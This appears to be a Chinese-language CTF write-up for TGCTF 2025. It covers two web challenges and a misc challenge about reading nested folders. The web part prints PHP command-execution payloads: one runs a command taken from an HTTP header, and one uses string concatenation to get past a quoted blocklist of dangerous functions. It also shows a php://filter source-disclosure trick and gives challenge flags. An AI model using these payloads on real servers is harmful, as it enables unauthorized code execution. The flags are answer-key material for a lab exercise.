web

AAA偷渡阴平

?tgctf2025=system(key(getallheaders()));

利用key(getallheaders())获取第一个文件头的值,再利用system执行,我们先目录遍历发现flag在../../..,然后修改指令为cat ../../../flag便能得到flag。

火眼辩魑魅

首先访问robots.txt发现有

1
2
3
4
5
6
7
User-Agent: *
Disallow: tgupload.php
Disallow: tgshell.php
Disallow: tgxff.php
Disallow: tgser.php
Disallow: tgphp.php
Disallow: tginclude.php

一个个看过去发现,tginclude.php可以用php伪协议php://filter/convert.base64-encode/resource=来读取其他页面的源码发现tgshell.php中是用if(!preg_match("/openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|scandir|assert|pcntl_exec|fwrite|curl|system|eval|assert|flag|passthru|exec|chroot|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore/i", $shell))

进行过滤的,那么我们可以利用字符串拼接来绕过如

('sy' . 'stem')('cat ../../../tgfffffllllaagggggg');

我们可以先目录遍历发现flag在前三层然后直接cat获取。

得到TGCTF{bd737064-fc78-5d40-df61-03e28c2a91e7}

misc

解压压缩包发现有好多层,直接叫豆包写代码打开最后一层

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import os


def read_deep_folder(folder_path, folder_name):
    try:
        # 构建下一层同名子文件夹的路径
        sub_folder_path = os.path.join(folder_path, folder_name)
        # 检查该路径是否为文件夹
        if os.path.isdir(sub_folder_path):
            # 若为文件夹,则递归调用函数继续查找
            return read_deep_folder(sub_folder_path, folder_name)
        # 若不是文件夹,返回当前路径
        return folder_path
    except FileNotFoundError:
        print(f"错误:未找到文件夹 {folder_path}。")
    except Exception as e:
        print(f"发生未知错误:{e}")
    return None


def read_files_in_folder(folder_path):
    try:
        if os.path.exists(folder_path):
            for root, dirs, files in os.walk(folder_path):
                for file in files:
                    file_path = os.path.join(root, file)
                    try:
                        with open(file_path, 'r', encoding='utf-8') as f:
                            content = f.read()
                            print(f"文件 {file_path} 的内容:")
                            print(content)
                    except Exception as e:
                        print(f"读取文件 {file_path} 时出错:{e}")
        else:
            print(f"文件夹 {folder_path} 不存在。")
    except Exception as e:
        print(f"发生未知错误:{e}")


if __name__ == "__main__":
    # 请替换为起始文件夹路径
    start_folder = "your_start_folder_path"
    # 请替换为要查找的同名文件夹名称
    target_folder_name = "your_target_folder_name"
    result = read_deep_folder(start_folder, target_folder_name)
    if result:
        print(f"最后一层的文件夹路径是: {result}")
        read_files_in_folder(result)

打开最后一层发现了

flag{so_great!}